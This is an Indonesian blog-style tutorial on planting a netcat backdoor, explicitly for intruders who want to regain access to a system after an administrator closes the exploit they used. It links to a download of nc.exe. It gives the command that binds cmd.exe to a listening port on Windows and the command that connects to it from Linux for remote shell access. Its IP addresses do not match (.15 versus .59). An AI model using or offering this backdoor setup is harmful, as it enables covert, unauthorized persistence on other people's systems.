Mengconnectkan netcat sebagai backdoor
Backdoor seringkali digunakan untuk masuk ke dalam sistem tanpa sepengetahuan administrator, namun hal tersebut bisa dilakukan jika penyusup pernah masuk kedalam sistem tersebut dengan hak akses root.
Pemberian backdoor ini dilakukan untuk mempermudah mereka memasuki sistem tersebut jika jalan yang telah dibuat dengan eksploit telah ditutup oleh administrator.
Jadi, tujuan dari backdoor bukan untuk mendapatkan previlege root, tetapi untuk mendapatkan kembali previlege yang pernah diperoleh.
jadi initinya kita tidak bisa masuk lewat pintu system jalan satu satunya adalah lewat pintu belakang
ok langsung saja disini kita menggunakan netcat bukan netcut yaa . . .
percobaan ini menggunakan 2 pc
1.windows
2.linux ( backtrack )
kalo yang belum punya netcat bisa download di http://www.mediafire.com/?2l8cqoqcs9f7doj untuk windows ekstrak dulu nc.exe dan taruh di directory C:
dan linux backtrack sudah tersedia nc.exe nya
1. kita akan mencoba menjadikan windows menjadi listen/server (pendengar)
disini ip address windows ( server 192.168.1.15)
buka cmd dan masuk directory C:
lalu ketikkan perintah
nc.exe -lvp 1234 -e cmd.exe1234 = port yang kita buka untuk listener
-e xxx = adalah program yang akan di akses jika connect ke server
sekarang coba si client (linux) mencoba untuk menghubungi ( mengconnectkan ke server ) dengan port yang telah ditentukan si server
ketikkan perintah
nc ipadddressserver port
nc 192.168.1.59 1234
dan suksess masuk ke cmd pada server
dan berikut screenshot jika ada client yang connect ke server backdoor